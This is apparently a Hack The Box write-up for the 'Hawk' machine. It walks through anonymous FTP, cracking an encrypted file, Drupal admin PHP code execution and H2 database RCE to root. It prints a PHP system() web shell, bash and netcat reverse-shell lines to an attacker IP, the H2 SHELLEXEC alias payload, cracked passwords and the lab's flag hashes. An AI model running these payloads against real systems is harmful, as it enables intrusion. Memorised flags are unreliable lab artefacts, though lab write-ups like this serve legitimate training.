Linux Boxes

hawk

  1. nmapAuto
    1. vuln scan
    2. udp scan
    3. recon
  2. http:80, 8082 & 9092
  3. ftp
    1. drupal.txt.enc
    2. bruteforce-salted-openssl
    3. dropal.txt.enc contents
  4. initial foothold
    1. dropal login
      1. droopescan
        1. enable php module
        2. php reverse shell
        3. php system RCE
  5. priv esc
    1. LinEnum.sh
    2. easy way (45506.py)
    3. ippsec way
      1. find resused password in /var/www/html settings.php file
      2. ssh to port 8082 locally with daniel user
      3. H2 exploit
        1. logging in with arbitrary database name
        2. RCE
        3. rev shell
  6. user/root
  7. lessons learned

hawk

images/1486-1.png
images/1486-2.png

nmapAuto

images/1502-1.png


images/1502-2.png


images/1502-3.png

vuln scan

images/1516-1.png

udp scan

snmp is running on the box, we'll keep that in mind but it is v3 which means its encrypted,

moving on for now
images/1520-1.png

recon

gobuster/nikto scans were a bit wanky and uninformative but the droopescan may have potentially interesting information about the box

images/1521-1.png

http:80, 8082 & 9092

drupal web server

images/1515-1.png

box is not allowing remote connections, we can set up a local connection with ssh after we establish a foothold on the box
images/1515-2.png


not sure what to make of this at the moment, moving on
images/1515-3.png

ftp

images/1519-1.png

the box has an ftp server that allows annonymous login, lets check that out

images/1519-2.png

moving into the messages directory we see there are no files in it, but lets check to see if there are hidden files with ls -la
images/1519-3.png

we see theres a drupal.txt.enc, lets download it with get
images/1519-4.png

drupal.txt.enc

lets first grab the file with get
images/1523-1.png

we see its openssl encrypted and base 64 encoded, so lets take it one step at a time and decode it from b64 first
images/1523-2.png

images/1523-3.png


and here's our file, lets decrpt the decoded file now
images/1523-4.png

bruteforce-salted-openssl

ippsec points us to the bruteforce-salted-openssl tool to tackle decrypting this file

a quick apt search also shows its in the rolling kali packages
images/1524-1.png
images/1524-2.png

trying default params we see the script fails,
images/1524-3.png

but if we change the digest cipher from md5 to sha256....


bruteforce-salted-openssl
-f /usr/share/wordlist/rockyou.txt
-d sha256
-dropal.txt.enc.decoded
images/1524-4.png

we see our password is friends

dropal.txt.enc contents

now that we have the encryption password, lets extract its contents

openssl aes-256-cbc -d -in drupal.txt.enc.decoded -out drupal.txt
images/1526-1.png

portal password is PencilKeyboardScanner123
images/1526-2.png

initial foothold

dropal admin access
php filter enabling
reverse shell

dropal login

putting in PencilKeyboardScanner123
images/1527-1.png


logs us in as admin! lets enumerate dropal a bit now with droopescan
images/1527-2.png

droopescan

droopescan is available on github

this drupal services has a php plugin! since we have admin access to the portal, we can upload RCE or call a rev shell back to our machine!
images/1525-1.png

enable php module

before we can add php code, we have to enable php filtering on the services through the Module feature
images/1530-1.png

images/1530-2.png
images/1530-3.png

images/1530-4.png

now when writing articles the text format allows php code to be uploaded and executed
images/1530-5.png

php reverse shell

first move a php-reverse-shell into our working directory, tweak the ip and port

images/1528-1.png

copy and paste the code into the article body and hit “preview”
images/1528-2.png


simply previewing the page while having a netcat listener set up will execute our php reverse shell!
images/1528-3.png

import a shell with python3
images/1528-4.png

and implement tab autocomplete with stty raw -echo and fg

images/1528-5.png

php system RCE

we can upload a php rev shell straight up or we can add a php script that will talk to the system and implement RCE for us

<?php system($_GET['cmd']); ?>
images/1529-1.png

images/1529-2.png

images/1529-3.png

we see we are redirected to the page we created
images/1529-4.png

and we can add commands to our url to execute them like the following:

images/1529-5.png

images/1529-6.png


lets execute a bash reverse shell from pentestmonkey

nc -e /bin/bash 10.10.14.62 4444 (url encode it w/ ctrl+U) bash+-c+'bash+>%26+/dev/tcp/10.10.14.62/4444+0>%261'
images/1529-7.png


images/1529-8.png

images/1529-9.png

priv esc

LinEnum to finding H2 service running

easy way and ippsec's way

LinEnum.sh

we all know the drill by now, set up and http server with LinEnum.sh and upload it to the victim

images/1536-1.png

images/1536-2.png

images/1536-3.png

The H2 database is run with root privileges. Let’s check access to the /opt/h2 directory.
images/1536-4.png

easy way (45506.py)

searchsploit H2
images/1535-1.png
images/1535-2.png

RCE and we're running the process as root already, lets take a closer look at 45506.py

images/1535-3.png

lets give it a shot

first mirror it over to our directory
searchsploit -m java/webapps/45506.py
images/1535-4.png


upload it to our victim
images/1535-5.png

wget 10.10.14.62:5555/45506.py
images/1535-6.png

and run it pointing to h2's service running on port 8082
images/1535-7.png

win
images/1535-8.png




ippsec way

going into the /var/www/html directory

find resused password in /var/www/html settings.php file

we can use grep in /var/www/html to search recursively for “password" strings

grep -R password
images/1541-1.png

we see this databases array has a drupal4hawk password, lets see if the password is reused

since our original openssl password was for a daniel, lets try those creds to connect to him

we're in!
images/1541-2.png


NOTE: we can spawn a shell here with os

images/1541-3.pngimages/1541-4.png

images/1541-5.png
images/1541-6.png

ssh to port 8082 locally with daniel user

recalling trying to connect to port 8082 earlier....
images/1542-1.pngimages/1542-2.png
we can use ssh here to connect to port 8082 locally on our victim

ssh -L 9003:127.0.0.1:8082 daniel@10.10.10.102
images/1542-3.png

since we set up our local port 9003 (cause it's over 9000) to connect to port 8082 locally from our victim, we are now free to connect to port 8082 via our local port 9003
images/1542-4.png

images/1542-5.png

H2 exploit

ippsec refers us to this google page:

images/1543-1.png

we can use an arbitrary database name to execute code from the H2 data base with the following script according to the article

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('id')CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('id')
images/1543-2.png

logging in with arbitrary database name

images/1544-1.png

images/1544-2.png

RCE

create alias shellexec as $$ string shellexec(string cmd) throws java.io.ioexception { java.util.scanner s = new java.util.scanner(runtime.getruntime().exec(cmd).getinputstream()).usedelimiter("\\a"); return s.hasnext() ? s.next() : ""; }$$;
call shellexec('id')create alias shellexec as $$ string shellexec(string cmd) throws java.io.ioexception { java.util.scanner s = new java.util.scanner(runtime.getruntime().exec(cmd).getinputstream()).usedelimiter("\\a"); return s.hasnext() ? s.next() : ""; }$$;
call shellexec('id')

we see id is run at the bottom of the screen, all we need to do is call a shell back to our attack machine as root
images/1545-1.png

rev shell

images/1546-1.png
lets create a file exec.sh and run it via h2

images/1546-2.png
images/1546-3.png


CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('id')CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('/tmp/exec.sh')

images/1546-4.png

images/1546-5.png

user/root

images/1537-1.png
d5111d4f75370ebd01cdba5b32e202a8

images/1537-2.png
54f3e840fe5564b42a8320fd2b608ba0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1547-1.png